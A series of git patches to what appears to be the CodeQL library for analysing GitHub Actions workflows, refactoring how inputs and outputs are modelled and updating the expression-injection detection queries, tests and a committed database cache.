exit on: push (normal) | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | | .github/workflows/test.yml:1:1:40:53 | on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 168987284c3..7524e31f050 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -9,49 +9,39 @@ query predicate files(File f) { any() } query predicate yamlNodes(YamlNode n) { any() } -query predicate jobNodes(JobStmt s) { any() } +query predicate jobNodes(Job s) { any() } -query predicate stepNodes(StepStmt s) { any() } +query predicate stepNodes(Step s) { any() } -query predicate allUsesNodes(UsesExpr s) { any() } +query predicate allUsesNodes(Uses s) { any() } -query predicate stepUsesNodes(StepUsesExpr s) { any() } +query predicate stepUsesNodes(StepUses s) { any() } -query predicate jobUsesNodes(JobUsesExpr s) { any() } +query predicate jobUsesNodes(JobUses s) { any() } -query predicate usesSteps(UsesExpr call, string argname, Expression arg) { +query predicate usesSteps(Uses call, string argname, Expression arg) { call.getArgumentExpr(argname) = arg } -query predicate runSteps1(RunExpr run, string body) { run.getScript() = body } +query predicate runSteps(Run run, string body) { run.getScript() = body } -query predicate runSteps2(RunExpr run, Expression bodyExpr) { run.getScriptExpr() = bodyExpr } - -query predicate runStepChildren(RunExpr run, AstNode child) { child.getParentNode() = run } - -query predicate varAccesses(ExprAccessExpr ea, string expr) { expr = ea.getExpression() } - -query predicate orphanVarAccesses(ExprAccessExpr va, string var) { - var = va.getExpression() and - not exists(AstNode n | n = va.getParentNode()) -} - -query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode parent) { - var = va.getExpression() and - parent = va.getParentNode() -} +query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run } query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { any() } +query predicate cfgNodes(Cfg::Node n) { + n.getLocation().getFile().getBaseName() = "argus_case_study.yml" +} //any() } -query predicate dfNodes(DataFlow::Node e) { any() } +query predicate dfNodes(DataFlow::Node e) { + e.getLocation().getFile().getBaseName() = "argus_case_study.yml" +} //any() } -query predicate exprNodes(DataFlow::ExprNode e) { any() } +query predicate exprNodes(DataFlow::Node e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } +query predicate usesIds(StepUses s, string a) { s.getId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } @@ -67,4 +57,4 @@ query predicate summaries(string action, string version, string input, string ou query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } -query predicate needs(DataFlow::ExprNode e) { e.asExpr() instanceof NeedsCtxAccessExpr } +query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression } From bcf308125912d17d3ab7460191948be90b292f44 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 1 Mar 2024 11:17:23 +0100 Subject: [PATCH 0082/1267] Refactor Input/Outpts --- ql/lib/codeql/actions/Ast.qll | 129 ++++++++++-------- .../actions/controlflow/internal/Cfg.qll | 38 ++---- .../codeql/actions/dataflow/FlowSources.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 11 +- .../dataflow/internal/DataFlowPublic.qll | 11 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/CompositeActionsSources.ql | 2 +- .../CWE-020/CompositeActionsSummaries.ql | 4 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSources.ql | 2 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 4 +- ql/test/library-tests/test.ql | 8 +- 12 files changed, 108 insertions(+), 107 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 881daf13336..cb561fdf8d1 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -2,7 +2,7 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations /** - * Base class for thejAST tree. Based on YamlNode from the Yaml library. + * Base class for the AST tree. Based on YamlNode from the Yaml library. */ class AstNode instanceof YamlNode { AstNode getParentNode() { result = super.getParentNode() } @@ -23,7 +23,7 @@ class AstNode instanceof YamlNode { /** * Gets a environment variable expression by name in the scope of the current node. */ - EnvExpr getEnvExpr(string name) { + Expression getEnvExpr(string name) { exists(Actions::Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | @@ -42,9 +42,18 @@ class AstNode instanceof YamlNode { class CompositeAction extends AstNode instanceof Actions::CompositeAction { Runs getRuns() { result = super.getRuns() } - Inputs getInputs() { result = this.(YamlMapping).lookup("inputs") } - Outputs getOutputs() { result = this.(YamlMapping).lookup("outputs") } + + Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + Input getAnInput() { this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + + Input getInput(string name) { + this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and + result.(YamlString).getValue() = name + } } class Runs extends AstNode instanceof Actions::Runs { @@ -81,23 +90,24 @@ class ReusableWorkflow extends Workflow { ReusableWorkflow() { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - Inputs getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } - Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } + + Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + + Input getInput(string name) { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and + result.(YamlString).getValue() = name + } } -class Inputs extends AstNode instanceof YamlMapping { +class Input extends AstNode { YamlMapping parent; - Inputs() { parent.lookup("inputs") = this } - - /** - * Gets a specific input expression (YamlMapping) by name. - */ - InputExpr getInputExpr(string name) { - result.(YamlString).getValue() = name and - this.(YamlMapping).maps(result, _) - } + Input() { parent.lookup("inputs").(YamlMapping).maps(this, _) } } class Outputs extends AstNode instanceof YamlMapping { @@ -106,9 +116,17 @@ class Outputs extends AstNode instanceof YamlMapping { Outputs() { parent.lookup("outputs") = this } /** - * Gets a specific output expression (YamlMapping) by name. + * Gets an output expression. */ - OutputExpr getOutputExpr(string name) { + Expression getAnOutputExpr() { + this.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = result or + this.(YamlMapping).lookup(_) = result + } + + /** + * Gets a specific output expression by name. + */ + Expression getOutputExpr(string name) { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or this.(YamlMapping).lookup(name) = result } @@ -130,7 +148,7 @@ class Strategy extends AstNode instanceof YamlMapping { /** * Gets a specific matric expression (YamlMapping) by name. */ - MatrixVariableExpr getMatrixVariableExpr(string name) { + Expression getMatrixVariableExpr(string name) { this.(YamlMapping).lookup("matrix").(YamlMapping).lookup(name) = result } @@ -318,41 +336,40 @@ class Run extends Step { string getScript() { result = scriptExpr.getValue() } } -/** - * An AST node associated with a Reusable Workflow input. - */ -class InputExpr extends AstNode { - InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } -} - -/** - * An AST node holding an Env var value. - */ -class EnvExpr extends AstNode { - EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } -} - -/** - * An AST node holding a job or workflow output var. - */ -class OutputExpr extends AstNode { - OutputExpr() { - exists(Outputs outputs | - outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or - outputs.(YamlMapping).lookup(_) = this - ) - } -} - -/** - * An AST node holding a matrix var. - */ -class MatrixVariableExpr extends AstNode { - MatrixVariableExpr() { - exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) - } -} - +// /** +// * An AST node associated with a Reusable Workflow input. +// */ +// class InputExpr extends AstNode { +// InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } +// } +// +// /** +// * An AST node holding an Env var value. +// */ +// class EnvExpr extends AstNode { +// EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } +// } +// +// /** +// * An AST node holding a job or workflow output var. +// */ +// class OutputExpr extends AstNode { +// OutputExpr() { +// exists(Outputs outputs | +// outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or +// outputs.(YamlMapping).lookup(_) = this +// ) +// } +// } +// +// /** +// * An AST node holding a matrix var. +// */ +// class MatrixVariableExpr extends AstNode { +// MatrixVariableExpr() { +// exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) +// } +// } /** * Evaluation of a workflow expression ${{}}. */ @@ -508,9 +525,9 @@ class InputsExpression extends ContextExpression { override AstNode getTarget() { result.getLocation().getFile() = this.getLocation().getFile() and ( - exists(ReusableWorkflow w | w.getInputs().getInputExpr(fieldName) = result) + exists(ReusableWorkflow w | w.getInput(fieldName) = result) or - exists(CompositeAction a | a.getInputs().getInputExpr(fieldName) = result) + exists(CompositeAction a | a.getInput(fieldName) = result) ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 2bc86723493..661544dfed2 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -148,8 +148,8 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos result = rank[i](AstNode child, Location l | ( - child = this.(CompositeAction).getInputs() or - child = this.(CompositeAction).getOutputs() or + child = this.(CompositeAction).getAnInput() or + child = this.(CompositeAction).getAnOutputExpr() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,10 +172,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { result = rank[i](AstNode child, Location l | ( - child = this.(ReusableWorkflow).getInputs() or - child = this.(ReusableWorkflow).getOutputs() or - child = this.(ReusableWorkflow).getStrategy() or - child = this.(ReusableWorkflow).getAJob() + child = this.(ReusableWorkflow).getAJob() or + child = this.(ReusableWorkflow).getAnInput() or + child = this.(ReusableWorkflow).getAnOutputExpr() or + child = this.(ReusableWorkflow).getStrategy() ) and l = child.getLocation() | @@ -199,19 +199,6 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { } } -private class InputsTree extends StandardPreOrderTree instanceof Inputs { - override ControlFlowTree getChildNode(int i) { - result = - rank[i](AstNode child, Location l | - child = super.getInputExpr(_) and l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - } -} - private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = @@ -287,14 +274,13 @@ private class RunTree extends StandardPreOrderTree instanceof Run { private class UsesLeaf extends LeafTree instanceof Uses { } -private class InputExprTree extends LeafTree instanceof InputExpr { } - -private class OutputExprTree extends LeafTree instanceof OutputExpr { } - -private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } - -private class EnvExprTree extends LeafTree instanceof EnvExpr { } +private class InputTree extends LeafTree instanceof Input { } +// private class OutputExprTree extends LeafTree instanceof OutputExpr { } +// +// private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } +// +// private class EnvExprTree extends LeafTree instanceof EnvExpr { } private class ExprAccessTree extends LeafTree instanceof ContextExpression { } private class AstNodeLeaf extends LeafTree instanceof Expression { } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c30c963afdb..32d37efdaae 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -160,7 +160,7 @@ private class ExternallyDefinedSource extends RemoteFlowSource { private class CompositeActionInputSource extends RemoteFlowSource { CompositeAction c; - CompositeActionInputSource() { c.getInputs().getInputExpr(_) = this.asExpr() } + CompositeActionInputSource() { c.getAnInput() = this.asExpr() } override string getSourceType() { result = "Composite action input" } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 62975959b39..d99db775d61 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -54,8 +54,13 @@ DataFlowType getNodeType(Node node) { any() } predicate nodeIsHidden(Node node) { none() } class DataFlowExpr extends Cfg::Node { - DataFlowExpr() { any() } - //DataFlowExpr() { this.getAstNode() instanceof Expression } + DataFlowExpr() { + this.getAstNode() instanceof Expression or + this.getAstNode() instanceof Uses or + this.getAstNode() instanceof Run or + this.getAstNode() instanceof Outputs or + this.getAstNode() instanceof Input + } } /** @@ -150,7 +155,7 @@ ContentApprox getContentApprox(Content c) { result = c } * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflow w).getInputs().getInputExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflow w).getInput(this)) } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index a8434cdb603..dbae273151b 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -48,22 +48,19 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private InputExpr input; + private Input input; - ParameterNode() { - this.asExpr() = input and - input = any(Inputs s).getInputExpr(_) - } + ParameterNode() { this.asExpr() = input } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - input = c.(ReusableWorkflow).getInputs().getInputExpr(pos) + input = c.(ReusableWorkflow).getInput(pos) } override string toString() { result = "input " + input.toString() } override Location getLocation() { result = input.getLocation() } - InputExpr getInputExpr() { result = input } + Input getInput() { result = input } } /** diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 5bff6abc7bb..4b78f275382 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -25,7 +25,7 @@ private class ExpressionInjectionSink extends DataFlow::Node { private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getAnInput() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 12703a6cff2..0edeb0a7ec8 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index e5933a73b36..59a05f64b6c 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getAnInput() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 1e1f942b200..28ff074fd96 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -25,7 +25,7 @@ private class ExpressionInjectionSink extends DataFlow::Node { private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 7bcea3d45b0..6e88f36fece 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 5ac0c299929..4f710a16e8f 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 7524e31f050..abdd087590a 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -29,13 +29,9 @@ query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { - n.getLocation().getFile().getBaseName() = "argus_case_study.yml" -} //any() } +query predicate cfgNodes(Cfg::Node n) { n.getLocation().getFile().getBaseName() = "test.yml" } //any() } -query predicate dfNodes(DataFlow::Node e) { - e.getLocation().getFile().getBaseName() = "argus_case_study.yml" -} //any() } +query predicate dfNodes(DataFlow::Node e) { e.getLocation().getFile().getBaseName() = "test.yml" } //any() } query predicate exprNodes(DataFlow::Node e) { any() } From 1c2f19f4e168b846508f76937118f6c94a245eca Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 1 Mar 2024 16:06:06 +0100 Subject: [PATCH 0083/1267] Merge Actions.qll and Ast.qll --- clean.sh | 2 + db/baseline-info.json | 1 + db/codeql-database.yml | 10 + db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 0 -> 40 bytes .../pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 0 -> 40 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 0 -> 8192 bytes .../cached-strings/pools/0/indices1/info | Bin 0 -> 40 bytes .../pools/0/indices1/page-000000 | Bin 0 -> 8192 bytes .../default/cache/cached-strings/pools/0/info | Bin 0 -> 41 bytes .../cached-strings/pools/0/metadata/info | Bin 0 -> 40 bytes .../pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../cache/cached-strings/pools/poolInfo | Bin 0 -> 28 bytes .../cache/cached-strings/tuple-pool/header | Bin 0 -> 4 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 0 -> 16 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 0 -> 216 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 0 -> 320 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 0 -> 216 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 0 -> 6312 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 0 -> 16 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 0 -> 12 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 0 -> 16 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 0 -> 12 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 0 -> 16 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 0 -> 12 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 0 -> 24 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-0defa4a0 | Bin 0 -> 16 bytes ...king#f6f2598d--TaintFlow-0defa4a0#0#tttttt | Bin 0 -> 3200 bytes ...Tracking#f6f2598d--TaintFlow-0defa4a0#1#tt | Bin 0 -> 896 bytes ...TaintTracking#f6f2598d--TaintFlow-5b92615f | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-5b92615f#0# | Bin 0 -> 12 bytes ...racking#f6f2598d--TaintFlow-5b92615f#1#ttt | Bin 0 -> 152 bytes ...TaintTracking#f6f2598d--TaintFlow-6e089ab6 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-6e089ab6#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-a2a08e4a | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-a2a08e4a#0# | Bin 0 -> 12 bytes ...Tracking#f6f2598d--TaintFlow-a2a08e4a#1#tt | Bin 0 -> 116 bytes ...TaintTracking#f6f2598d--TaintFlow-b0571e78 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-b0571e78#0# | Bin 0 -> 12 bytes ...tTracking#f6f2598d--TaintFlow-b0571e78#1#t | Bin 0 -> 88 bytes ...TaintTracking#f6f2598d--TaintFlow-b18fe878 | Bin 0 -> 16 bytes ...tTracking#f6f2598d--TaintFlow-b18fe878#0#t | Bin 0 -> 2216 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 0 -> 16 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 0 -> 12 bytes ...ow---Cached--TAccessPathFront-12309985#1#t | Bin 0 -> 104 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 0 -> 16 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 0 -> 12 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 0 -> 112 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 0 -> 12 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 0 -> 112 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 0 -> 12 bytes ...---Cached--TApproxAccessPathF-baba9c49#1#t | Bin 0 -> 104 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 0 -> 16 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 0 -> 12 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 0 -> 24 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 0 -> 16 bytes ...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 0 -> 12 bytes ...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 0 -> 12 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 0 -> 16 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 0 -> 12 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 0 -> 280 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 0 -> 16 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 0 -> 12 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 0 -> 16 bytes ...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 0 -> 12 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 0 -> 16 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 0 -> 12 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 0 -> 12 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 0 -> 16 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 0 -> 16 bytes .../tuples#DataFlowPrivate#6a54d7ad--TContent | Bin 0 -> 16 bytes ...les#DataFlowPrivate#6a54d7ad--TContent#0#s | Bin 0 -> 104 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 0 -> 16 bytes ...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 0 -> 12 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 0 -> 16 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 0 -> 2216 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 0 -> 16 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 0 -> 12 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 0 -> 16 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 0 -> 12 bytes ...4d7ad--DataFlowType---TOption-4fb642c9#1#t | Bin 0 -> 16 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 0 -> 16 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 0 -> 12 bytes ...Unit#54592529--Unit---TOption-51176e26#1#t | Bin 0 -> 16 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 0 -> 16 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 0 -> 12 bytes db/db-yaml/default/cache/pages/01.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/01.pack.d | Bin 0 -> 844 bytes db/db-yaml/default/cache/pages/02.pack | Bin 0 -> 79 bytes db/db-yaml/default/cache/pages/08.pack | Bin 0 -> 87 bytes db/db-yaml/default/cache/pages/09.pack | Bin 0 -> 167 bytes db/db-yaml/default/cache/pages/09.pack.d | Bin 0 -> 2341 bytes db/db-yaml/default/cache/pages/0b.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/0b.pack.d | Bin 0 -> 292 bytes db/db-yaml/default/cache/pages/0d.pack | Bin 0 -> 84 bytes db/db-yaml/default/cache/pages/17.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/17.pack.d | Bin 0 -> 5326 bytes db/db-yaml/default/cache/pages/20.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/20.pack.d | Bin 0 -> 574 bytes db/db-yaml/default/cache/pages/24.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/24.pack.d | Bin 0 -> 6318 bytes db/db-yaml/default/cache/pages/26.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/26.pack.d | Bin 0 -> 294 bytes db/db-yaml/default/cache/pages/27.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/27.pack.d | Bin 0 -> 1493 bytes db/db-yaml/default/cache/pages/29.pack | Bin 0 -> 84 bytes db/db-yaml/default/cache/pages/2b.pack | Bin 0 -> 84 bytes db/db-yaml/default/cache/pages/2d.pack | Bin 0 -> 91 bytes db/db-yaml/default/cache/pages/33.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/33.pack.d | Bin 0 -> 393 bytes db/db-yaml/default/cache/pages/37.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/37.pack.d | Bin 0 -> 106 bytes db/db-yaml/default/cache/pages/3c.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/3c.pack.d | Bin 0 -> 916 bytes db/db-yaml/default/cache/pages/42.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/42.pack.d | Bin 0 -> 5053 bytes db/db-yaml/default/cache/pages/45.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/45.pack.d | Bin 0 -> 6001 bytes db/db-yaml/default/cache/pages/46.pack | Bin 0 -> 111 bytes db/db-yaml/default/cache/pages/4c.pack | Bin 0 -> 65 bytes db/db-yaml/default/cache/pages/4c.pack.d | Bin 0 -> 302 bytes 